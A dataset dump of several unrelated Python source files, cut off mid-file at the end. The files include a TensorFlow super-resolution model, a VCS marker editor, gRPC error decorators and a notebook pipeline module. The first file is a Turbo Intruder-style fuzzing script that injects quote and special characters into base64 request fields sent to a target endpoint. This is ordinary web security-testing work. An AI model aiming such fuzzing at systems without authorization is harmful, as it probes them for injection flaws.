id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
29310
|
from haptyc import *
from base64 import b64encode, b64decode
import json
class TestLogic(Transform):
#
# test_h1: Decodes base64, fuzzes using random_insert, Re-encodes base64
# Number of tests: 50
#
@ApplyIteration(50)
def test_h1(self, data, state):
data = b64decode(data)
data = random_insert(data,list("'"))
data = b64encode(data)
return data
#
# test_jsonfuzz: Deserialize JSON
# Loop through every key
# Decodes base64
# fuzzes using random_insert
# Re-encodes base64
# Serialize JSON
# Number of tests: 50
#
@ApplyIteration(50)
def test_jsonfuzz(self, data, state):
JA = json.loads(data)
for key in JA:
JA[key] = b64encode(random_insert(b64decode(JA[key]), list("!@#$%^&*()")))
return json.dumps(JA)
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=1, pipeline=0)
TestFactory = TestLogic(target.req)
for test in TestFactory:
engine.queue(test)
def handleResponse(req, interesting):
table.add(req)
|
29327
|
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
class Generator:
def __init__(self, learning_rate=1e-4, num_blocks=6):
self.learning_rate = learning_rate
self.num_blocks = num_blocks
def pelu(self, x):
with tf.variable_scope(x.op.name + '_activation', initializer=tf.constant_initializer(1.0), reuse=tf.AUTO_REUSE):
shape = x.get_shape().as_list()[1:]
alpha = tf.get_variable('alpha', 1, constraint=lambda t: tf.maximum(t, 0.1))
beta = tf.get_variable('beta', 1, constraint=lambda t: tf.maximum(t, 0.1))
positive = tf.nn.relu(x) * alpha / (beta + 1e-9)
negative = alpha * (tf.exp((-tf.nn.relu(-x)) / (beta + 1e-9)) - 1)
return negative + positive
def adaptive_global_average_pool_2d(self, x):
c = x.get_shape()[-1]
ADAP2d = tf.reshape(tf.reduce_mean(x, axis=[1, 2]), (-1, 1, 1, c))
return ADAP2d
def channel_attention(self, x, f, reduction):
skip_conn = tf.identity(x, name='identity')
x = self.adaptive_global_average_pool_2d(x)
x = tf.layers.conv2d(x, kernel_size=1, filters=f//reduction, strides=1, padding='same')
x = self.pelu(x)
x = tf.layers.conv2d(x, kernel_size=1, filters=f, strides=1, padding='same')
x = tf.nn.sigmoid(x)
CA = tf.multiply(skip_conn, x)
return CA
def ResidualBlock(self, x, kernel_size, filters, strides=1):
x = tf.layers.conv2d(x, kernel_size=1, filters=filters, strides=1, padding='same')
skip = x
x1 = x
for i in range(3):
tm1 = slim.conv2d(x1, num_outputs=filters, kernel_size=[3, 3], stride=1)
tm1 = self.pelu(tm1)
tm1 = slim.conv2d(tm1, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm1 = self.pelu(tm1)
tm1 = slim.conv2d(tm1, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm1 = self.channel_attention(tm1, f=filters, reduction=4)
x1 = tf.concat([x1,tm1], axis=3)
x2 = x
for i in range(3):
tm2 = slim.conv2d(x2, num_outputs=filters, kernel_size=[3, 3], stride=1)
tm2 = self.pelu(tm2)
tm2 = slim.conv2d(tm2, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm2 = self.pelu(tm2)
tm2 = slim.conv2d(tm2, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm2 = self.channel_attention(tm2, f=filters, reduction=4)
x2 = tf.concat([x2,tm2], axis=3)
x3 = x
for i in range(3):
tm3 = slim.conv2d(x3, num_outputs=filters, kernel_size=[3, 3], stride=1)
tm3 = self.pelu(tm3)
tm3 = slim.conv2d(tm3, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm3 = self.pelu(tm3)
tm3 = slim.conv2d(tm3, num_outputs=filters, kernel_size=[1, 1], stride=1)
tm3 = self.channel_attention(tm3, f=filters, reduction=4)
x3 = tf.concat([x3,tm3], axis=3)
x5 = tf.concat(values=[x1, x2, x3], axis=3, name='stack0')
x6 = tf.layers.conv2d(x5, kernel_size=1, filters=filters, strides=strides, padding='same', use_bias=False)
x7 = skip + x6
return x7
def Upsample2xBlock(self, x, kernel_size, filters, strides):
#size = tf.shape(x)
#h = size[1]
#w = size[2]
#x = tf.image.resize_nearest_neighbor(x, size=[h * 3, w * 3], align_corners=False, name=None)
x = tf.layers.conv2d(x, kernel_size=kernel_size, filters=filters, strides=strides, padding='same')
x = tf.depth_to_space(x, 2)
x = self.pelu(x)
return x
def ThermalSR(self, x, reuse=False, isTraining=True):
with tf.variable_scope("ThermalSR", reuse=reuse) as scope:
x4 = tf.layers.conv2d(x, kernel_size=7, filters=64, strides=1, padding='same')
x4 = self.pelu(x4)
skip = x4
# Global Residual Learning
size = tf.shape(x)
h = size[1]
w = size[2]
x_GRL = tf.image.resize_bicubic(x, size=[h * 4, w * 4], align_corners=False, name=None)
x_GRL = tf.layers.conv2d(x_GRL, kernel_size=1, filters=64, strides=1, padding='same')
x_GRL = self.pelu(x_GRL)
x_GRL = tf.layers.conv2d(x_GRL, kernel_size=1, filters=16, strides=1, padding='same')
x_GRL = self.pelu(x_GRL)
x_GRL = tf.layers.conv2d(x_GRL, kernel_size=1, filters=3, strides=1, padding='same')
x_GRL = self.pelu(x_GRL)
for i in range(4):
x4 = self.ResidualBlock(x4, kernel_size=1, filters=64, strides=1)
x4 = tf.layers.conv2d(x4, kernel_size=1, filters=64, strides=1, padding='same', use_bias=False)
x4 = self.pelu(x4)
x4 = tf.concat([x4, skip], axis=3)
x4 = tf.layers.conv2d(x4, kernel_size=3, filters=64, strides=1, padding='same', use_bias=False)
x4 = self.pelu(x4)
x4 = x4 + skip
with tf.variable_scope('Upsamplingconv_stage_1'):
xUP = self.Upsample2xBlock(x4, kernel_size=3, filters=64, strides = 1)
xUP = tf.layers.conv2d(xUP, kernel_size=1, filters=64, strides=1, padding='same', use_bias=False)
xUP = self.pelu(xUP)
skip1 = xUP
for i in range(2):
x5 = self.ResidualBlock(xUP, kernel_size=1, filters=32, strides=1)
x5 = tf.layers.conv2d(x5, kernel_size=1, filters=32, strides=1, padding='same', use_bias=False)
x5 = self.pelu(x5)
x5 = tf.concat([x5, skip1], axis=3)
x5 = tf.layers.conv2d(x5, kernel_size=3, filters=64, strides=1, padding='same', use_bias=False)
x5 = self.pelu(x5)
x5 = x5 + skip1
with tf.variable_scope('Upsamplingconv_stage_2'):
x6 = self.Upsample2xBlock(x5, kernel_size=3, filters=64, strides = 1)
x6 = tf.layers.conv2d(x6, kernel_size=3, filters=64, strides=1, padding='same', name='forward_4')
x6 = self.pelu(x6)
x6 = tf.layers.conv2d(x6, kernel_size=3, filters=3, strides=1, padding='same', name='forward_5')
x6 = self.pelu(x6)
x_final = x6 + x_GRL
return x_final
|
29329
|
from vcs import vtk_ui
from vcs.colorpicker import ColorPicker
from vcs.vtk_ui import behaviors
from vcs.VCS_validation_functions import checkMarker
import vtk
import vcs.vcs2vtk
from . import priority
import sys
class MarkerEditor(
behaviors.ClickableMixin, behaviors.DraggableMixin, priority.PriorityEditor):
"""
Editor for marker objects
Ctrl + click to drop a new marker, toolbar to configure, priority, draggable + handles on each marker.
"""
def __init__(self, interactor, marker, index, display, configurator):
self.interactor = interactor
self.marker = marker
self.index = index
self.configurator = configurator
actors = display.backend["vtk_backend_marker_actors"][index]
self.glyph, self.glyph_source, self.polydata, self.actor, self.geo = actors
self.display = display
self.handles = []
for ind, x in enumerate(marker.x[index]):
y = marker.y[index][ind]
h = vtk_ui.Handle(
self.interactor, (x, y), dragged=self.adjust, color=(
0, 0, 0), normalize=True)
h.show()
self.handles.append(h)
self.toolbar = vtk_ui.toolbar.Toolbar(
self.interactor,
"Marker Options")
self.toolbar.show()
self.toolbar.add_button(["Change Color"], action=self.change_color)
self.toolbar.add_slider_button(
marker.size[index],
1,
300,
"Marker Size",
update=self.set_size)
self.type_bar = self.toolbar.add_toolbar(
"Marker Type",
open_label="Change")
shapes = marker_shapes()
shapes.insert(0, "Select Shape")
self.shape_button = self.type_bar.add_button(
shapes,
action=self.change_shape)
wmos = wmo_shapes()
wmos.insert(0, "Select WMO Marker")
self.wmo_button = self.type_bar.add_button(
wmos,
action=self.change_wmo)
if self.marker.type[self.index] in shapes:
self.shape_button.set_state(
shapes.index(
self.marker.type[
self.index]))
else:
self.wmo_button.set_state(wmos.index(self.marker.type[self.index]))
# Used to store the color picker when it's active
self.picker = None
prop = vtk.vtkTextProperty()
prop.SetBackgroundColor(.87, .79, .55)
prop.SetBackgroundOpacity(1)
prop.SetColor(0, 0, 0)
self.tooltip = vtk_ui.Label(
self.interactor,
"%s + Click to place new markers." %
("Cmd" if sys.platform == "darwin" else "Ctrl"),
textproperty=prop)
self.tooltip.left = 0
self.tooltip.top = self.interactor.GetRenderWindow(
).GetSize()[1] - self.tooltip.get_dimensions()[1]
self.tooltip.show()
super(MarkerEditor, self).__init__()
self.register()
def get_object(self):
return self.marker
def handle_click(self, point):
x, y = point
# Control drops a new instance
return self.in_bounds(x, y) or self.toolbar.in_toolbar(
x, y) or self.current_modifiers()["control"]
def is_object(self, marker):
return self.marker == marker
def place(self):
for h in self.handles:
h.place()
self.toolbar.place()
def render(self):
from vcs.vtk_ui.manager import get_manager
m = get_manager(self.interactor)
m.queue_render()
def update_shape(self):
# Update the glyph for the marker to reflect the new shape
self.glyph_source, self.polydata = vcs.vcs2vtk.prepGlyph(
self.glyph, self.marker, self.index)
self.display.backend["vtk_backend_marker_actors"][
self.index] = (
self.glyph,
self.glyph_source,
self.polydata,
self.actor,
self.geo)
# Have to rescale the glyph now... work that out later with charles
self.render()
def change_shape(self, index):
if index != 0:
self.marker.type[self.index] = marker_shapes()[index - 1]
self.wmo_button.set_state(0)
self.update_shape()
else:
self.change_wmo(1)
def change_wmo(self, index):
if index != 0:
self.marker.type[self.index] = wmo_shapes()[index - 1]
self.shape_button.set_state(0)
self.update_shape()
else:
self.change_shape(1)
def set_size(self, size):
self.marker.size[self.index] = size
self.update_shape()
def change_color(self, state):
if self.picker:
self.picker.make_current()
else:
self.picker = ColorPicker(
500,
500,
self.marker.colormap,
self.marker.color[
self.index],
parent_interactor=self.interactor,
on_save=self.set_color,
on_cancel=self.cancel_color)
def set_color(self, colormap, color):
self.marker.colormap = colormap
self.marker.color[self.index] = color
del self.picker
self.picker = None
vcs.vcs2vtk.setMarkerColor(
self.actor.GetProperty(),
self.marker,
self.marker.color[
self.index])
self.render()
def cancel_color(self):
del self.picker
self.picker = None
def click_release(self):
x, y = self.event_position()
if self.current_modifiers()["control"]:
h = vtk_ui.Handle(
self.interactor, (x, y), dragged=self.adjust, color=(
0, 0, 0), normalize=True)
h.show()
self.handles.append(h)
self.marker.x[self.index].append(x)
self.marker.y[self.index].append(y)
self.sync_positions()
def adjust(self, handle, dx, dy):
ind = self.handles.index(handle)
self.marker.x[self.index][ind] += dx
self.marker.y[self.index][ind] += dy
self.sync_positions()
def in_bounds(self, x, y):
w, h = self.interactor.GetRenderWindow().GetSize()
return inside_marker(
self.marker, x, y, w, h, index=self.index) is not None
def right_release(self):
x, y = self.event_position()
if self.in_bounds(x, y):
points = list(zip(self.marker.x[self.index], self.marker.y[self.index]))
size = self.marker.size[self.index]
screen_width, screen_height = self.interactor.GetRenderWindow(
).GetSize()
w, h = float(size) / screen_width, float(size) / screen_height
for ind, point in enumerate(points):
m_x, m_y = point
if x > m_x - w and x < m_x + w and y > m_y - h and y < m_y + h:
break
del self.marker.x[self.index][ind]
del self.marker.y[self.index][ind]
self.handles[ind].detach()
del self.handles[ind]
if len(self.marker.x[self.index]) == 0:
del self.marker.x[self.index]
del self.marker.y[self.index]
del self.marker.type[self.index]
del self.marker.color[self.index]
if len(self.marker.x) == 0:
self.delete()
return
self.sync_positions()
def detach(self):
self.unregister()
if self.picker:
self.picker.close()
self.picker = None
self.toolbar.detach()
for h in self.handles:
h.detach()
self.tooltip.detach()
def delete(self):
self.actor.SetVisibility(0)
self.configurator.deactivate(self)
def update_priority(self):
maxLayers = self.interactor.GetRenderWindow().GetNumberOfLayers()
new_layer = self.marker.priority * 10000 + 1 + \
self.configurator.displays.index(self.display)
if new_layer + 1 > maxLayers:
self.interactor.GetRenderWindow().SetNumberOfLayers(new_layer + 1)
self.actor.SetLayerNumber(new_layer)
self.render()
def sync_positions(self):
# Sync all points
points = self.glyph.GetInput().GetPoints()
for i, (x, y) in enumerate(
zip(self.marker.x[self.index], self.marker.y[self.index])):
if i == points.GetNumberOfPoints():
points.InsertNextPoint(x, y, 0)
else:
points.SetPoint(i, x, y, 0)
self.glyph.GetInput().Modified()
self.render()
__shape_cache = {}
def marker_shapes():
# Returns all shapes that are supported (skips star for now), indexed
# numerically
shapes = []
for i in range(1, 20):
if i in __shape_cache:
shapes.append(__shape_cache[i])
else:
try:
val = checkMarker(None, "type", i)
shapes.append(val)
__shape_cache[i] = val
except ValueError:
pass
return shapes
def wmo_shapes():
wmo = []
for i in range(100, 203):
if i in __shape_cache:
wmo.append(__shape_cache[i])
else:
try:
val = checkMarker(None, "type", i)
wmo.append(val)
__shape_cache[i] = val
except ValueError:
pass
return wmo
def inside_marker(marker, x, y, screen_width, screen_height, index=None):
if index is None:
index = list(range(len(marker.x)))
else:
index = [index]
for ind in index:
marker_x, marker_y = marker.x[ind], marker.y[ind]
coords = list(zip(marker_x, marker_y))
size = marker.size[ind]
w, h = float(size) / screen_width, float(size) / screen_height
for m_x, m_y in coords:
if x > m_x - w and x < m_x + w and y > m_y - h and y < m_y + h:
return ind
return None
|
29330
|
from functools import wraps
from typing import Any, Callable, TypeVar, cast
from grpc import Call, RpcError
from grpc.aio import AioRpcError
from .exceptions import AioRequestError, RequestError
from .logging import get_metadata_from_aio_error, get_metadata_from_call, log_error
TFunc = TypeVar("TFunc", bound=Callable[..., Any])
def handle_request_error(name: str):
def decorator(func: TFunc) -> TFunc:
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
return func(*args, **kwargs)
except RpcError as e:
if issubclass(type(e), Call):
metadata = get_metadata_from_call(e)
tracking_id = metadata.tracking_id if metadata else None
log_error(
tracking_id,
name,
f"{e.code().name} {e.details()}", # type:ignore
)
raise RequestError(
e.code(), e.details(), metadata # type:ignore
) from e
raise
return cast(TFunc, wrapper)
return decorator
def handle_request_error_gen(name: str):
def decorator(func: TFunc) -> TFunc:
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
yield from func(*args, **kwargs)
except RpcError as e:
if issubclass(type(e), Call):
metadata = get_metadata_from_call(e)
tracking_id = metadata.tracking_id if metadata else None
log_error(
tracking_id,
name,
f"{e.code().name} {e.details()}", # type:ignore
)
raise RequestError(
e.code(), e.details(), metadata # type:ignore
) from e
raise
return cast(TFunc, wrapper)
return decorator
def handle_aio_request_error(name: str):
def decorator(func: TFunc) -> TFunc:
@wraps(func)
async def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
return await func(*args, **kwargs)
except AioRpcError as e:
metadata = get_metadata_from_aio_error(e)
tracking_id = metadata.tracking_id if metadata else None
log_error(
tracking_id,
name,
f"{e.code().name} {e.details()}", # type:ignore
)
raise AioRequestError(
e.code(), e.details(), metadata # type:ignore
) from e
return cast(TFunc, wrapper)
return decorator
def handle_aio_request_error_gen(name: str):
def decorator(func: TFunc) -> TFunc:
@wraps(func)
async def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
async for result in func(*args, **kwargs):
yield result
except AioRpcError as e:
metadata = get_metadata_from_aio_error(e)
tracking_id = metadata.tracking_id if metadata else None
log_error(
tracking_id,
name,
f"{e.code().name} {e.details()}", # type:ignore
)
raise AioRequestError(
e.code(), e.details(), metadata # type:ignore
) from e
return cast(TFunc, wrapper)
return decorator
|
29346
|
from spotdl import handle
from spotdl import const
from spotdl import downloader
import os
import sys
const.args = handle.get_arguments(to_group=True)
track = downloader.Downloader(raw_song=const.args.song[0])
track_title = track.refine_songname(track.content.title)
track_filename = track_title + const.args.output_ext
track_download_path = os.path.join(const.args.folder, track_filename)
print(track_filename)
|
29397
|
import torch
from torch.distributions import Uniform
from rl_sandbox.constants import CPU
class UniformPrior:
def __init__(self, low, high, device=torch.device(CPU)):
self.device = device
self.dist = Uniform(low=low, high=high)
def sample(self, num_samples):
return self.dist.rsample(sample_shape=num_samples).to(self.device)
def lprob(self, samples):
return self.dist.log_prob(samples)
|
29426
|
def countWord(word):
count = 0
with open('test.txt') as file:
for line in file:
if word in line:
count += line.count(word)
return count
word = input('Enter word: ')
count = countWord(word)
print(word, '- occurence: ', count)
|
29439
|
import json
import pickle
import re
from copy import copy, deepcopy
from functools import lru_cache
from json import JSONDecodeError
from os import system, walk, sep
from abc import ABC, abstractmethod
from pathlib import Path
import time
from subprocess import check_output
from tempfile import NamedTemporaryFile
from warnings import warn
from .utils import subset_dict_preserving_order, run_command, nice_time
class no_quotes(str):
def __repr__(self):
original = super().__repr__()
return original[1:-1]
class Rule(ABC):
"""Design principles (or how does it differ from snakemake):
- fully python3; no strange make/python mishmash
- prefer verbosity over ambiguity (named inputs/outputs)
- Jupyter centered
- interactive graphs
- implicit passing of arguments to the executing command
"""
cache_dir: Path
tmp_dir: Path
is_setup = False
rules = {}
def __init__(self, name, **kwargs):
"""Notes:
- input and output will be passed in the same order as it appears in kwargs
- if the input is a dictionary, the keys will be interpreted as argument names;
empty key can be used to insert a positional argument
- the arguments will be serialized preserving the Python type, i.e.
input={'name': 1}
may result in:
--name 1
while:
input={'name': "1"}
would result in
--name "1"
You can force string to be displayed without quotes using:
input={'name': no_quotes("1")}
"""
assert name not in self.rules
self.name = name
self.execution_time = None
self.rules[name] = self
extra_kwargs = set(kwargs) - {'output', 'input', 'group', 'parameters'}
if extra_kwargs:
raise Exception(f'Unrecognized keyword arguments to {self.__class__.__name__}: {extra_kwargs}')
self.arguments = subset_dict_preserving_order(
kwargs,
{'input', 'output', 'parameters'}
)
self.group = kwargs.get('group', None)
self.outputs = {}
self.inputs = {}
self.parameters = {}
if 'output' in kwargs:
output = kwargs['output']
# todo support lists of positionals
self.outputs = output if isinstance(output, dict) else {'': output}
if 'input' in kwargs:
input = kwargs['input']
self.inputs = input if isinstance(input, dict) else {'': input}
if 'parameters' in kwargs:
self.parameters = kwargs['parameters']
@property
def has_inputs(self):
return len(self.inputs) != 0
@property
def has_outputs(self):
return len(self.outputs) != 0
@abstractmethod
def run(self, use_cache: bool) -> int:
if not self.is_setup:
raise ValueError('Please set up the rules class settings with Rule.setup() first!')
@classmethod
def setup(cls, cache_dir: Path, tmp_dir: Path):
cls.cache_dir = Path(cache_dir)
cls.tmp_dir = Path(tmp_dir)
cls.is_setup = True
@abstractmethod
def to_json(self):
pass
def __repr__(self):
fragments = [repr(self.name)]
if self.group:
fragments.append(f'({self.group})')
if self.has_inputs or self.has_outputs:
fragments.append('with')
if self.has_inputs:
fragments.append(f'{len(self.inputs)} inputs')
if self.has_inputs and self.has_outputs:
fragments.append('and')
if self.has_outputs:
fragments.append(f'{len(self.outputs)} outputs')
fragments = ' '.join(fragments)
return f'<{self.__class__.__name__} {fragments}>'
class Group:
"""A group of rules"""
groups = {}
def __init__(self, id: str, name: str, color='#cccccc', parent=None):
assert name not in self.groups
self.name = name
self.id = id
self.color = color
self.groups[id] = self
self.parent = parent
def to_json(self):
return {
'label': self.name,
'id': self.id,
'color': self.color,
'parent': self.parent
}
class ShellRule(Rule):
"""
Named arguments will be passed in order,
preceded with a single dash for single letter names
or a double dash for longer names.
"""
def __init__(self, name, command, **kwargs):
super().__init__(self, name, **kwargs)
self.command = command
def serialize(self, arguments_group):
if isinstance(arguments_group, dict):
return ' '.join(
(
(
('-' + key if len(key) == 1 else '--' + key)
+
' '
)
if len(key) else
''
) + (
repr(value)
)
for key, value in arguments_group.items()
)
else:
return repr(arguments_group)
@property
def serialized_arguments(self):
return ' '.join({
self.serialize(arguments_group)
for arguments_group in self.arguments.values()
})
def run(self, use_cache=False) -> int:
super().run(use_cache)
start_time = time.time()
status = system(f'{self.command} {self.serialized_arguments}')
self.execution_time = time.time() - start_time
return status
def to_json(self):
return {
'name': self.command,
'arguments': self.serialized_arguments,
'execution_time': self.execution_time,
'type': 'shell'
}
def expand_run_magics(notebook):
out_notebook = copy(notebook)
new_cells = []
for cell in notebook['cells']:
if cell['cell_type'] != 'code':
new_cells.append(cell)
continue
if any(line.startswith('%run') for line in cell['source']):
other_code = []
for line in cell['source']:
if line.startswith('%run'):
if other_code:
split_cell = copy(cell)
split_cell['source'] = other_code
new_cells.append(split_cell)
other_code = []
to_include = line[5:].strip()
with open(to_include) as o:
nb_run = json.load(o)
new_cells.extend(nb_run['cells'])
else:
other_code.append(line)
if other_code:
split_cell = copy(cell)
split_cell['source'] = other_code
new_cells.append(split_cell)
else:
new_cells.append(cell)
out_notebook['cells'] = new_cells
return out_notebook
class NotebookRule(Rule):
options: None
@property
def output_nb_dir(self) -> Path:
return self.tmp_dir / 'out'
@property
def reference_nb_dir(self) -> Path:
return self.tmp_dir / 'ref'
@property
def stripped_nb_dir(self) -> Path:
return self.tmp_dir / 'stripped'
def __init__(
self, *args, notebook,
diff=True,
deduce_io=True,
deduce_io_from_data_vault=True,
execute=True,
**kwargs
):
"""Rule for Jupyter Notebooks
Args:
deduce_io: whether to automatically deduce inputs and outputs from the code cells tagged "inputs" and "outputs";
local variables defined in the cell will be evaluated and used as inputs or outputs.
If you want to generate paths with a helper function for brevity, assign a dict of {variable: path}
to `__inputs__`/`__outputs__` in the tagged cell using `io.create_paths()` helper.
diff: whether to generate diffs against the current state of the notebook
deduce_io_from_data_vault: whether to deduce the inputs and outputs from `data_vault` magics
(`%vault store` and `%vault import`), see https://github.com/krassowski/data-vault
execute: if False, the notebook will note be run; useful to include final "leaf" notebooks
which may take too long to run, but are not essential to the overall results
"""
super().__init__(*args, **kwargs)
self.todos = []
self.notebook = notebook
self.absolute_notebook_path = Path(notebook).absolute()
self.generate_diff = diff
self.diff = None
self.text_diff = None
self.fidelity = None
self.images = []
self.headers = []
self.status = None
self.execute = execute
from datetime import datetime, timedelta
month_ago = (datetime.today() - timedelta(days=30)).timestamp()
self.changes = run_command(f'git rev-list --max-age {month_ago} HEAD --count {self.notebook}')
if deduce_io:
self.deduce_io_from_tags()
if deduce_io_from_data_vault:
self.deduce_io_from_data_vault()
def deduce_io_from_data_vault(self):
notebook_json = self.notebook_json
stored = set()
for index, cell in enumerate(notebook_json['cells']):
if 'source' not in cell:
continue
for line in cell['source']:
if line.startswith('%vault'):
try:
from data_vault import VaultMagics
from data_vault.actions import ImportAction, StoreAction
from data_vault.parsing import split_variables, unquote
except ImportError:
warn('Could not deduce I/O from data-vault %vault magics: data_vault not installed')
return
vault_magics = VaultMagics()
arguments = vault_magics.extract_arguments(line[7:])
action = vault_magics.select_action(arguments)
if isinstance(action, ImportAction):
variables = arguments['import']
for var_index, variable in enumerate(split_variables(variables)):
if 'from' in arguments:
import_path = arguments['from'] + '/' + variable
else:
import_path = unquote(arguments['import'])
if import_path in stored:
warn(f'Skipping {line} which was previously stored from this notebook to avoid cycles')
else:
self.inputs[(index, var_index)] = import_path
elif isinstance(action, StoreAction):
variables = split_variables(arguments['store'])
if 'as' in arguments:
assert len(variables) == 1
variables = [arguments['as']]
for var_index, variable in enumerate(variables):
store_path = arguments['in'] + '/' + variable
self.outputs[(index, var_index)] = store_path
stored.add(store_path)
def deduce_io_from_tags(self, io_tags={'inputs', 'outputs'}):
notebook_json = self.notebook_json
io_cells = {}
for index, cell in enumerate(notebook_json['cells']):
if 'tags' in cell['metadata']:
cell_io_tags = io_tags.intersection(cell['metadata']['tags'])
if cell_io_tags:
assert len(cell_io_tags) == 1
io_cells[list(cell_io_tags)[0]] = cell, index
for io, (cell, index) in io_cells.items():
assert not getattr(self, f'has_{io}')
source = ''.join(cell['source'])
if f'__{io}__' in source:
assert len(cell['outputs']) == 1
# TODO: search through lists
values = cell['outputs'][0]['metadata']
else:
# so we don't want to use eval (we are not within an isolated copy yet!),
# thus only simple regular expression matching which will fail on multi-line strings
# (and anything which is dynamically generated)
assignments = {
match.group('key'): match.group('value')
for match in re.finditer(r'^\s*(?P<key>.*?)\s*=\s*([\'"])(?P<value>.*)\2', source, re.MULTILINE)
}
values = {
key: value
for key, value in assignments.items()
if key.isidentifier() and value
}
if len(assignments) != len(values):
# TODO: add nice exception or warning
raise
setattr(self, io, values)
def serialize(self, arguments_group):
return '-p ' + (' -p '.join(
f'{key} {value}'
for key, value in arguments_group.items()
))
@property
def serialized_arguments(self):
return ' '.join({
self.serialize(arguments_group)
for arguments_group in self.arguments.values()
if arguments_group
})
def outline(self, max_depth=3):
return self.headers
@property
@lru_cache()
def notebook_json(self):
with open(self.absolute_notebook_path) as f:
return expand_run_magics(json.load(f))
def maybe_create_output_dirs(self):
if self.has_outputs:
for name, output in self.outputs.items():
path = Path(output)
path = path.parent
if not path.exists():
print(f'Creating path "{path}" for "{name}" output argument')
path.mkdir(parents=True, exist_ok=True)
def run(self, use_cache=True) -> int:
"""
Run JupyterNotebook using PaperMill and compare the output with reference using nbdime
Returns: status code from the papermill run (0 if successful)
"""
super().run(use_cache)
notebook = self.notebook
path = Path(notebook)
output_nb_dir = self.output_nb_dir / path.parent
output_nb_dir.mkdir(parents=True, exist_ok=True)
reference_nb_dir = self.reference_nb_dir / path.parent
reference_nb_dir.mkdir(parents=True, exist_ok=True)
stripped_nb_dir = self.stripped_nb_dir / path.parent
stripped_nb_dir.mkdir(parents=True, exist_ok=True)
output_nb = output_nb_dir / path.name
reference_nb = reference_nb_dir / path.name
stripped_nb = stripped_nb_dir / path.name
md5 = run_command(f'md5sum {str(self.absolute_notebook_path)}').split()[0]
cache_dir = self.cache_dir / path.parent
cache_dir.mkdir(parents=True, exist_ok=True)
cache_nb_file = cache_dir / f'{md5}.json'
to_cache = ['execution_time', 'fidelity', 'diff', 'text_diff', 'todos', 'headers', 'images']
if use_cache and cache_nb_file.exists():
with open(cache_nb_file, 'rb') as f:
pickled = pickle.load(f)
print(f'Reusing cached results for {self}')
for key in to_cache:
setattr(self, key, pickled[key])
return 0
notebook_json = self.notebook_json
self.images = [
output['data']['image/png']
for cell in notebook_json['cells']
for output in cell.get('outputs', [])
if 'data' in output and 'image/png' in output['data']
]
self.headers = []
for cell in notebook_json['cells']:
if cell['cell_type'] == 'markdown':
for line in cell['source']:
if line.startswith('#'):
self.headers.append(line)
for cell in notebook_json['cells']:
for line in cell.get('source', ''):
if 'TODO' in line:
self.todos.append(line)
# strip outputs (otherwise if it stops, the diff will be too optimistic)
notebook_stripped = deepcopy(notebook_json)
for cell in notebook_json['cells']:
cell['outputs'] = []
with open(stripped_nb, 'w') as f:
json.dump(notebook_stripped, f)
if self.execute:
# execute
start_time = time.time()
status = system(f'papermill {stripped_nb} {output_nb} {self.serialized_arguments}') or 0
self.execution_time = time.time() - start_time
else:
status = 0
warn(f'Skipping {self} (execute != True)')
if self.execute and self.generate_diff:
# inject parameters to a "reference" copy (so that we do not have spurious noise in the diff)
system(
f'papermill {self.absolute_notebook_path} {reference_nb} {self.serialized_arguments} --prepare-only'
# do not print "Input Notebook:" and "Output Notebook:" for the second time
' --log-level WARNING'
)
with NamedTemporaryFile(delete=False) as tf:
command = f'nbdiff {reference_nb} {output_nb} --ignore-metadata --ignore-details --out {tf.name}'
result = run_command(command)
with open(tf.name) as f:
try:
self.diff = json.load(f)
except JSONDecodeError as e:
warn(f'Could not load the diff file: {result}, {f.readlines()}')
command = f'nbdiff {reference_nb} {output_nb} --ignore-metadata --ignore-details --no-use-diff --no-git'
self.text_diff = run_command(command)
from ansi2html import Ansi2HTMLConverter
conv = Ansi2HTMLConverter()
self.text_diff = conv.convert(self.text_diff)
changes = len(self.diff[0]['diff']) if self.diff else 0
# TODO: count only the code cells, not markdown cells?
total_cells = len(notebook_json['cells'])
self.fidelity = (total_cells - changes) / total_cells * 100
if status == 0:
with open(cache_nb_file, 'wb') as f:
pickle.dump({
key: getattr(self, key)
for key in to_cache
}, f)
self.status = status
return status
def to_json(self):
notebook_name = Path(self.notebook).name
return {
'name': self.name,
'arguments': self.serialized_arguments,
'execution_time': self.execution_time,
'type': 'notebook',
'notebook': self.notebook,
'notebook_name': notebook_name,
'fidelity': self.fidelity,
'changes_this_month': self.changes,
'nice_time': nice_time(self.execution_time),
'diff': self.diff,
'text_diff': self.text_diff,
'images': self.images,
'label': self.notebook,
'headers': self.headers,
'status': self.status,
'todos': self.todos,
'group': self.group
# TODO: requires testing
# 'is_tracked': is_tracked_in_version_control(self.notebook)
}
def to_graphiz(self, changes=False):
data = self.to_json()
# TODO: move to static_graph
buttons = []
if changes: # TODO allow to activate
buttons += [f'<td href="{self.repository_url}/commits/master/{self.notebook}">{self.changes} changes this month</td>']
if self.fidelity is not None:
buttons += [f'<td href="">Reproducibility: {self.fidelity:.2f}%</td>']
if self.execution_time is not None:
buttons += [f'<td>Runtime: {nice_time(self.execution_time)}</td>']
buttons_html = '\n'.join(buttons)
if buttons_html:
buttons_html = f'<tr>{ buttons_html }</tr>'
return {
**data,
**{
'shape': 'plain',
'label': f"""<<table cellspacing="0">
<tr><td href="{self.repository_url}/blob/master/{self.notebook}" colspan="{len(buttons)}" title="{data['notebook_name']}">{self.name.replace('&', ' and ')}</td></tr>
</table>>"""
}
}
def is_tracked_in_version_control(file: str):
return check_output(f'git ls-files {file}', shell=True)
def discover_notebooks(root_path='.', ignore=None, ignored_dirs=None, only_tracked_in_git=False, ignore_prefixes=('__', '.')):
"""Useful when working with input/output auto-detection"""
ignored_dirs = ignored_dirs or set()
ignore = ignore or set()
names = {}
rules = []
from typing import Dict
groups: Dict[str, Group] = {}
for dirpath, _, files in walk(root_path):
dirs = dirpath.split(sep)[1:]
if any(dir.startswith('.') or dir in ignored_dirs for dir in dirs):
continue
for file in files:
if any(file.startswith(prefix) for prefix in ignore_prefixes):
continue
if not file.endswith('.ipynb'):
